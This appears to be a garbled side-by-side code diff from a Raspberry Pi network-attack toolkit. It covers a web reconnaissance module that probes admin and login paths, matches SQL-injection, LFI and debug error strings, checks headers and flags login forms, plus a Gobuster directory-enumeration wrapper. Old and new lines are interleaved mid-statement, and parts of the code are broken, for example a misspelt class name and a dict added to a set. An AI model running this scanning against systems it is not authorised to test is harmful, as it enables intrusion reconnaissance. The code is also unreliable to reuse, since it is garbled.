logger = Logger(name="valkyrie_scout.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_status = "ValkyrieScout"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 50
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "8/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
# Small default list to keep the action cheap on Pi Zero.
DEFAULT_PATHS = [
"/",
"/robots.txt",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
]
# Keep patterns minimal and high-signal.
SQLI_ERRORS = [
"error in your sql syntax",
"mysql_fetch",
"unclosed quotation mark",
"ora-",
"postgresql",
"sqlite error",
]
LFI_HINTS = [
"include(",
"require(",
"include_once(",
"require_once(",
]
DEBUG_HINTS = [
"stack trace",
"traceback",
"exception",
"fatal error",
"notice:",
"warning:",
"debug",
]
b_class = "ValkyrieScout" def _scheme_for_port(port: int) -> str:
b_module = "valkyrie_scout" https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
b_enabled = 0 return "https" if int(port) in https_ports else "http"
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings def _first_hostname_from_row(row: Dict) -> str:
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/webscan"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "valkyrie_scout_settings.json")
# Common web vulnerabilities to check
VULNERABILITY_PATTERNS = {
'sql_injection': [
"error in your SQL syntax",
"mysql_fetch_array",
"ORA-",
"PostgreSQL",
],
'xss': [
"<script>alert(1)</script>",
"javascript:alert(1)",
],
'lfi': [
"include(",
"require(",
"include_once(",
"require_once(",
]
}
class ValkyieScout:
def __init__(self, url, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, delay=0.1):
self.base_url = url.rstrip('/')
self.wordlist = wordlist
self.output_dir = output_dir
self.threads = threads
self.delay = delay
self.discovered_paths = set()
self.vulnerabilities = []
self.forms = []
self.session = requests.Session()
self.session.headers = {
'User-Agent': 'Valkyrie Scout Web Scanner',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
self.lock = threading.Lock()
def load_wordlist(self):
"""Load directory wordlist."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r') as f:
return [line.strip() for line in f if line.strip()]
return [
'admin', 'wp-admin', 'administrator', 'login', 'wp-login.php',
'upload', 'uploads', 'backup', 'backups', 'config', 'configuration',
'dev', 'development', 'test', 'testing', 'staging', 'prod',
'api', 'v1', 'v2', 'beta', 'debug', 'console', 'phpmyadmin',
'mysql', 'database', 'db', 'wp-content', 'includes', 'tmp', 'temp'
]
def scan_path(self, path):
"""Scan a single path for existence and vulnerabilities."""
url = urljoin(self.base_url, path)
try:
response = self.session.get(url, allow_redirects=False)
if response.status_code in [200, 301, 302, 403]:
with self.lock:
self.discovered_paths.add({
'path': path,
'url': url,
'status_code': response.status_code,
'content_length': len(response.content),
'timestamp': datetime.now().isoformat()
})
# Scan for vulnerabilities
self.check_vulnerabilities(url, response)
# Extract and analyze forms
self.analyze_forms(url, response)
except Exception as e:
logging.error(f"Error scanning {url}: {e}")
def check_vulnerabilities(self, url, response):
"""Check for common vulnerabilities in the response."""
try:
content = response.text.lower()
for vuln_type, patterns in VULNERABILITY_PATTERNS.items():
for pattern in patterns:
if pattern.lower() in content:
with self.lock:
self.vulnerabilities.append({
'type': vuln_type,
'url': url,
'pattern': pattern,
'timestamp': datetime.now().isoformat()
})
# Additional checks
self.check_security_headers(url, response)
self.check_information_disclosure(url, response)
except Exception as e:
logging.error(f"Error checking vulnerabilities for {url}: {e}")
def analyze_forms(self, url, response):
"""Analyze HTML forms for potential vulnerabilities."""
try:
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
for form in forms:
form_data = {
'url': url,
'method': form.get('method', 'get').lower(),
'action': urljoin(url, form.get('action', '')),
'inputs': [],
'timestamp': datetime.now().isoformat()
}
# Analyze form inputs
for input_field in form.find_all(['input', 'textarea']):
input_data = {
'type': input_field.get('type', 'text'),
'name': input_field.get('name', ''),
'id': input_field.get('id', ''),
'required': input_field.get('required') is not None
}
form_data['inputs'].append(input_data)
with self.lock:
self.forms.append(form_data)
except Exception as e:
logging.error(f"Error analyzing forms in {url}: {e}")
def check_security_headers(self, url, response):
"""Check for missing or misconfigured security headers."""
security_headers = {
'X-Frame-Options': 'Missing X-Frame-Options header',
'X-XSS-Protection': 'Missing X-XSS-Protection header',
'X-Content-Type-Options': 'Missing X-Content-Type-Options header',
'Strict-Transport-Security': 'Missing HSTS header',
'Content-Security-Policy': 'Missing Content-Security-Policy'
}
for header, message in security_headers.items():
if header not in response.headers:
with self.lock:
self.vulnerabilities.append({
'type': 'missing_security_header',
'url': url,
'detail': message,
'timestamp': datetime.now().isoformat()
})
def check_information_disclosure(self, url, response):
"""Check for information disclosure in response."""
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'internal_ip': r'\b(?:192\.168|10\.|172\.(?:1[6-9]|2[0-9]|3[01]))\.\d{1,3}\.\d{1,3}\b',
'debug_info': r'(?:stack trace|debug|error|exception)',
'version_info': r'(?:version|powered by|built with)'
}
content = response.text.lower()
for info_type, pattern in patterns.items():
matches = re.findall(pattern, content, re.IGNORECASE)
if matches:
with self.lock:
self.vulnerabilities.append({
'type': 'information_disclosure',
'url': url,
'info_type': info_type,
'findings': matches,
'timestamp': datetime.now().isoformat()
})
def save_results(self):
"""Save scan results to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
# Save discovered paths
if self.discovered_paths:
paths_file = os.path.join(self.output_dir, f"paths_{timestamp}.json")
with open(paths_file, 'w') as f:
json.dump(list(self.discovered_paths), f, indent=4)
# Save vulnerabilities
if self.vulnerabilities:
vulns_file = os.path.join(self.output_dir, f"vulnerabilities_{timestamp}.json")
with open(vulns_file, 'w') as f:
json.dump(self.vulnerabilities, f, indent=4)
# Save form analysis
if self.forms:
forms_file = os.path.join(self.output_dir, f"forms_{timestamp}.json")
with open(forms_file, 'w') as f:
json.dump(self.forms, f, indent=4)
logging.info(f"Results saved to {self.output_dir}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the web application scan."""
try:
logging.info(f"Starting web scan on {self.base_url}")
paths = self.load_wordlist()
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.scan_path, paths)
self.save_results()
except Exception as e:
logging.error(f"Scan error: {e}")
finally:
self.session.close()
def save_settings(url, wordlist, output_dir, threads, delay):
"""Save settings to JSON file."""
try: try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True) hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
settings = { if ";" in hn:
"url": url, hn = hn.split(";", 1)[0].strip()
"wordlist": wordlist, return hn
"output_dir": output_dir, except Exception:
"threads": threads, return ""
"delay": delay
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file.""" def _lower_headers(headers: Dict[str, str]) -> Dict[str, str]:
if os.path.exists(SETTINGS_FILE): out = {}
for k, v in (headers or {}).items():
if not k:
continue
out[str(k).lower()] = str(v)
return out
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = _lower_headers(headers)
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
missing_headers = []
for header in [
"x-frame-options",
"x-content-type-options",
"content-security-policy",
"referrer-policy",
]:
if header not in h:
missing_headers.append(header)
# HSTS is only relevant on HTTPS.
if "strict-transport-security" not in h:
missing_headers.append("strict-transport-security")
rate_limited_hint = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
# Very cheap "issue hints"
issues = []
for s in SQLI_ERRORS:
if s in snippet:
issues.append("sqli_error_hint")
break
for s in LFI_HINTS:
if s in snippet:
issues.append("lfi_hint")
break
for s in DEBUG_HINTS:
if s in snippet:
issues.append("debug_hint")
break
cookie_names = []
if set_cookie:
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"missing_security_headers": missing_headers[:12],
"rate_limited_hint": bool(rate_limited_hint),
"issues": issues[:8],
"cookie_names": cookie_names[:12],
"server": h.get("server", ""),
"x_powered_by": h.get("x-powered-by", ""),
}
class ValkyrieScout:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _fetch(
self,
*,
ip: str,
port: int,
scheme: str,
path: str,
timeout_s: float,
user_agent: str,
max_bytes: int,
) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
headers_out: Dict[str, str] = {}
status = 0
size = 0
body_snip = ""
conn = None
try: try:
with open(SETTINGS_FILE, 'r') as f: if scheme == "https":
return json.load(f) conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
except Exception as e: else:
logging.error(f"Failed to load settings: {e}") conn = HTTPConnection(ip, port=port, timeout=timeout_s)
return {}
def main(): conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
parser = argparse.ArgumentParser(description="Web application vulnerability scanner") resp = conn.getresponse()
parser.add_argument("-u", "--url", help="Target URL to scan") status = int(resp.status or 0)
parser.add_argument("-w", "--wordlist", help="Path to directory wordlist") for k, v in resp.getheaders():
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory") if k and v:
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads") headers_out[str(k)] = str(v)
parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests")
chunk = resp.read(max_bytes)
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def _db_upsert(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
path: str,
status: int,
size: int,
response_ms: int,
content_type: str,
payload: dict,
user_agent: str,
):
try:
headers_json = json.dumps(payload, ensure_ascii=True)
except Exception:
headers_json = ""
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'valkyrie_scout', 'GET', ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
user_agent or "",
headers_json,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebScout/1.0"))
max_bytes = int(getattr(self.shared_data, "web_probe_max_bytes", 65536))
delay_s = float(getattr(self.shared_data, "valkyrie_delay_s", 0.05))
paths = getattr(self.shared_data, "valkyrie_scout_paths", None)
if not isinstance(paths, list) or not paths:
paths = DEFAULT_PATHS
# UI
self.shared_data.bjorn_orch_status = "ValkyrieScout"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
max_bytes=max_bytes,
)
# Only keep minimal info; do not store full HTML.
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
payload = {
"signals": signals,
"sample": {"status": int(status), "content_type": ctype, "rt_ms": int(elapsed_ms)},
}
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
payload=payload,
user_agent=user_agent,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"status": str(status),
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
if delay_s > 0:
time.sleep(delay_s)
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ValkyrieScout (light web scout)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="80")
args = parser.parse_args() args = parser.parse_args()
settings = load_settings() sd = SharedData()
url = args.url or settings.get("url") act = ValkyrieScout(sd)
wordlist = args.wordlist or settings.get("wordlist") row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": ""}
output_dir = args.output or settings.get("output_dir") print(act.execute(args.ip, args.port, row, "ValkyrieScout"))
threads = args.threads or settings.get("threads")
delay = args.delay or settings.get("delay")
if not url:
logging.error("URL is required. Use -u or save it in settings")
return
save_settings(url, wordlist, output_dir, threads, delay)
scanner = ValkyieScout(
url=url,
wordlist=wordlist,
output_dir=output_dir,
threads=threads,
delay=delay
)
scanner.execute()
if __name__ == "__main__":
main()

View File

@@ -3,11 +3,11 @@
""" """
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`. web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
- Writes each finding into the `webenum` table - Writes each finding into the `webenum` table in REAL-TIME (Streaming).
- ON CONFLICT(mac_address, ip, port, directory) DO UPDATE - Updates bjorn_progress with actual percentage (0-100%).
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) - Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
- No filesystem output: parse Gobuster stdout directly - No filesystem output: parse Gobuster stdout/stderr directly.
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes - Filtrage dynamique des statuts HTTP via shared_data.web_status_codes.
""" """
import re import re
@@ -15,6 +15,9 @@ import socket
import subprocess import subprocess
import threading import threading
import logging import logging
import time
import os
import select
from typing import List, Dict, Tuple, Optional, Set from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData from shared import SharedData
@@ -27,8 +30,8 @@ b_class = "WebEnumeration"
b_module = "web_enum" b_module = "web_enum"
b_status = "WebEnumeration" b_status = "WebEnumeration"
b_port = 80 b_port = 80
b_service = '["http","https"]' b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]' b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None b_parent = None
b_priority = 9 b_priority = 9
b_cooldown = 1800 b_cooldown = 1800
@@ -36,8 +39,6 @@ b_rate_limit = '3/86400'
b_enabled = 1 b_enabled = 1
# -------------------- Defaults & parsing -------------------- # -------------------- Defaults & parsing --------------------
# Valeur de secours si l'UI n'a pas encore initialisé shared_data.web_status_codes
# (par défaut: 2xx utiles, 3xx, 401/403/405 et tous les 5xx; 429 non inclus)
DEFAULT_WEB_STATUS_CODES = [ DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206, 200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308, 301, 302, 303, 307, 308,
@@ -50,7 +51,6 @@ CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
# Gobuster "dir" line examples handled: # Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/] # /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
# /images (Status: 200) [Size: 12345]
GOBUSTER_LINE = re.compile( GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s* r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s* \(Status:\s*(?P<status>\d{3})\)\s*
@@ -60,13 +60,14 @@ GOBUSTER_LINE = re.compile(
re.VERBOSE re.VERBOSE
) )
# Regex pour capturer la progression de Gobuster sur stderr
# Ex: "Progress: 1024 / 4096 (25.00%)"
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
def _normalize_status_policy(policy) -> Set[int]: def _normalize_status_policy(policy) -> Set[int]:
""" """
Transforme une politique "UI" en set d'entiers HTTP. Transforme une politique "UI" en set d'entiers HTTP.
policy peut contenir:
- int (ex: 200, 403)
- "xXX" (ex: "2xx", "5xx")
- "a-b" (ex: "500-504")
""" """
codes: Set[int] = set() codes: Set[int] = set()
if not policy: if not policy:
@@ -99,30 +100,48 @@ def _normalize_status_policy(policy) -> Set[int]:
class WebEnumeration: class WebEnumeration:
""" """
Orchestrates Gobuster web dir enum and writes normalized results into DB. Orchestrates Gobuster web dir enum and writes normalized results into DB.
In-memory only: no CSV, no temp files. Streaming mode: Reads stdout/stderr in real-time for DB inserts and Progress UI.
""" """
def __init__(self, shared_data: SharedData): def __init__(self, shared_data: SharedData):
self.shared_data = shared_data self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster` self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock() self.lock = threading.Lock()
# Cache pour la taille de la wordlist (pour le calcul du %)
self.wordlist_size = 0
self._count_wordlist_lines()
# ---- Sanity checks # ---- Sanity checks
import os self._available = True
if not os.path.exists(self.gobuster_path): if not os.path.exists(self.gobuster_path):
raise FileNotFoundError(f"Gobuster not found at {self.gobuster_path}") logger.error(f"Gobuster not found at {self.gobuster_path}")
self._available = False
if not os.path.exists(self.wordlist): if not os.path.exists(self.wordlist):
raise FileNotFoundError(f"Wordlist not found: {self.wordlist}") logger.error(f"Wordlist not found: {self.wordlist}")
self._available = False
# Politique venant de lUI : créer si absente # Politique venant de lUI : créer si absente
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes: if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy() self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info( logger.info(
f"WebEnumeration initialized (stdout mode, no files). " f"WebEnumeration initialized (Streaming Mode). "
f"Using status policy: {self.shared_data.web_status_codes}" f"Wordlist lines: {self.wordlist_size}. "
f"Policy: {self.shared_data.web_status_codes}"
) )
def _count_wordlist_lines(self):
"""Compte les lignes de la wordlist une seule fois pour calculer le %."""
if self.wordlist and os.path.exists(self.wordlist):
try:
# Lecture rapide bufferisée
with open(self.wordlist, 'rb') as f:
self.wordlist_size = sum(1 for _ in f)
except Exception as e:
logger.error(f"Error counting wordlist lines: {e}")
self.wordlist_size = 0
# -------------------- Utilities -------------------- # -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str: def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080} https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
@@ -184,155 +203,195 @@ class WebEnumeration:
except Exception as e: except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}") logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
# -------------------- Gobuster runner (stdout) -------------------- # -------------------- Public API (Streaming Version) --------------------
def _run_gobuster_stdout(self, url: str) -> Optional[str]:
base_cmd = [
self.gobuster_path, "dir",
"-u", url,
"-w", self.wordlist,
"-t", "10",
"--quiet",
"--no-color",
# Si supporté par ta version gobuster, tu peux réduire le bruit dès la source :
# "-b", "404,429",
]
def run(cmd):
return subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# Try with -z first
cmd = base_cmd + ["-z"]
logger.info(f"Running Gobuster on {url}...")
try:
res = run(cmd)
if res.returncode == 0:
logger.success(f"Gobuster OK on {url}")
return res.stdout or ""
# Fallback if -z is unknown
if "unknown flag" in (res.stderr or "").lower() or "invalid" in (res.stderr or "").lower():
logger.info("Gobuster doesn't support -z, retrying without it.")
res2 = run(base_cmd)
if res2.returncode == 0:
logger.success(f"Gobuster OK on {url} (no -z)")
return res2.stdout or ""
logger.info(f"Gobuster failed on {url}: {res2.stderr.strip()}")
return None
logger.info(f"Gobuster failed on {url}: {res.stderr.strip()}")
return None
except Exception as e:
logger.error(f"Gobuster exception on {url}: {e}")
return None
def _parse_gobuster_text(self, text: str) -> List[Dict]:
"""
Parse gobuster stdout lines into entries:
{ 'path': '/admin', 'status': 301, 'size': 310, 'redirect': 'http://...'|None }
"""
entries: List[Dict] = []
if not text:
return entries
for raw in text.splitlines():
# 1) strip ANSI/control BEFORE regex
line = ANSI_RE.sub("", raw)
line = CTL_RE.sub("", line)
line = line.strip()
if not line:
continue
m = GOBUSTER_LINE.match(line)
if not m:
logger.debug(f"Unparsed line: {line}")
continue
# 2) extract all fields NOW
path = m.group("path") or ""
status = int(m.group("status"))
size = int(m.group("size") or 0)
redir = m.group("redir")
# 3) normalize path
if not path.startswith("/"):
path = "/" + path
path = "/" + path.strip("/")
entries.append({
"path": path,
"status": status,
"size": size,
"redirect": redir.strip() if redir else None
})
logger.info(f"Parsed {len(entries)} entries from gobuster stdout")
return entries
# -------------------- Public API --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str: def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
""" """
Run gobuster on (ip,port), parse stdout, upsert each finding into DB. Run gobuster on (ip,port), STREAM stdout/stderr, upsert findings real-time.
Updates bjorn_progress with 0-100% completion.
Returns: 'success' | 'failed' | 'interrupted' Returns: 'success' | 'failed' | 'interrupted'
""" """
if not self._available:
return 'failed'
try: try:
if self.shared_data.orchestrator_should_exit: if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted before start (orchestrator flag).")
return "interrupted" return "interrupted"
scheme = self._scheme_for_port(port) scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}" base_url = f"{scheme}://{ip}:{port}"
logger.info(f"Enumerating {base_url} ...")
self.shared_data.bjornorch_status = "WebEnumeration" # Setup Initial UI
self.shared_data.comment_params = {"ip": ip, "port": str(port), "url": base_url}
if self.shared_data.orchestrator_should_exit: self.shared_data.bjorn_orch_status = "WebEnumeration"
logger.info("Interrupted before gobuster run.") self.shared_data.bjorn_progress = "0%"
return "interrupted"
logger.info(f"Enumerating {base_url} (Stream Mode)...")
stdout_text = self._run_gobuster_stdout(base_url)
if stdout_text is None:
return "failed"
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted after gobuster run (stdout captured).")
return "interrupted"
entries = self._parse_gobuster_text(stdout_text)
if not entries:
logger.warning(f"No entries for {base_url}.")
return "success" # scan ran fine but no findings
# ---- Filtrage dynamique basé sur shared_data.web_status_codes
allowed = self._allowed_status_set()
pre = len(entries)
entries = [e for e in entries if e["status"] in allowed]
post = len(entries)
if post < pre:
preview = sorted(list(allowed))[:10]
logger.info(
f"Filtered out {pre - post} entries not in policy "
f"{preview}{'...' if len(allowed) > 10 else ''}."
)
# Prepare Identity & Policy
mac_address, hostname = self._extract_identity(row) mac_address, hostname = self._extract_identity(row)
if not hostname: if not hostname:
hostname = self._reverse_dns(ip) hostname = self._reverse_dns(ip)
allowed = self._allowed_status_set()
for e in entries: # Command Construction
self._db_add_result( # NOTE: Removed "--quiet" and "-z" to ensure we get Progress info on stderr
mac_address=mac_address, # But we use --no-color to make parsing easier
ip=ip, cmd = [
hostname=hostname, self.gobuster_path, "dir",
port=port, "-u", base_url,
directory=e["path"], "-w", self.wordlist,
status=e["status"], "-t", "10", # Safe for RPi Zero
size=e.get("size", 0), "--no-color",
response_time=0, # gobuster doesn't expose timing here "--no-progress=false", # Force progress bar even if redirected
content_type=None, # unknown here; a later HEAD/GET probe can fill it ]
tool="gobuster"
process = None
findings_count = 0
stop_requested = False
# For progress calc
total_lines = self.wordlist_size if self.wordlist_size > 0 else 1
last_progress_update = 0
try:
# Merge stdout and stderr so we can read everything in one loop
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
bufsize=1,
universal_newlines=True
) )
return "success" # Use select() (on Linux) so we can react quickly to stop requests
# without blocking forever on readline().
while True:
if self.shared_data.orchestrator_should_exit:
stop_requested = True
break
if process.poll() is not None:
# Process exited; drain remaining buffered output if any
line = process.stdout.readline() if process.stdout else ""
if not line:
break
else:
line = ""
if process.stdout:
if os.name != "nt":
r, _, _ = select.select([process.stdout], [], [], 0.2)
if r:
line = process.stdout.readline()
else:
# Windows: select() doesn't work on pipes; best-effort read.
line = process.stdout.readline()
if not line:
continue
# 3. Clean Line
clean_line = ANSI_RE.sub("", line).strip()
clean_line = CTL_RE.sub("", clean_line).strip()
if not clean_line:
continue
# 4. Check for Progress
if "Progress:" in clean_line:
now = time.time()
# Update UI max every 0.5s to save CPU
if now - last_progress_update > 0.5:
m_prog = GOBUSTER_PROGRESS_RE.search(clean_line)
if m_prog:
curr = int(m_prog.group("current"))
# Calculate %
pct = (curr / total_lines) * 100
pct = min(pct, 100.0)
self.shared_data.bjorn_progress = f"{int(pct)}%"
last_progress_update = now
continue
# 5. Check for Findings (Standard Gobuster Line)
m_res = GOBUSTER_LINE.match(clean_line)
if m_res:
st = int(m_res.group("status"))
# Apply Filtering Logic BEFORE DB
if st in allowed:
path = m_res.group("path")
if not path.startswith("/"): path = "/" + path
size = int(m_res.group("size") or 0)
redir = m_res.group("redir")
# Insert into DB Immediately
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=path,
status=st,
size=size,
response_time=0,
content_type=None,
tool="gobuster"
)
findings_count += 1
# Live feedback in comments
self.shared_data.comment_params = {
"url": base_url,
"found": str(findings_count),
"last": path
}
continue
# (Optional) Log errors/unknown lines if needed
# if "error" in clean_line.lower(): logger.debug(f"Gobuster err: {clean_line}")
# End of loop
if stop_requested:
logger.info("Interrupted by orchestrator.")
return "interrupted"
self.shared_data.bjorn_progress = "100%"
return "success"
except Exception as e:
logger.error(f"Execute error on {base_url}: {e}")
if process:
try:
process.terminate()
except Exception:
pass
return "failed"
finally:
if process:
try:
if stop_requested and process.poll() is None:
process.terminate()
# Always reap the child to avoid zombies.
try:
process.wait(timeout=2)
except Exception:
try:
process.kill()
except Exception:
pass
try:
process.wait(timeout=2)
except Exception:
pass
finally:
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
except Exception as e: except Exception as e:
logger.error(f"Execute error on {ip}:{port}: {e}") logger.error(f"General execution error: {e}")
return "failed" return "failed"
@@ -341,7 +400,7 @@ if __name__ == "__main__":
shared_data = SharedData() shared_data = SharedData()
try: try:
web_enum = WebEnumeration(shared_data) web_enum = WebEnumeration(shared_data)
logger.info("Starting web directory enumeration...") logger.info("Starting web directory enumeration (CLI)...")
rows = shared_data.read_data() rows = shared_data.read_data()
for row in rows: for row in rows:
@@ -351,6 +410,7 @@ if __name__ == "__main__":
port = row.get("port") or 80 port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...") logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories") status = web_enum.execute(ip, int(port), row, "enum_web_directories")
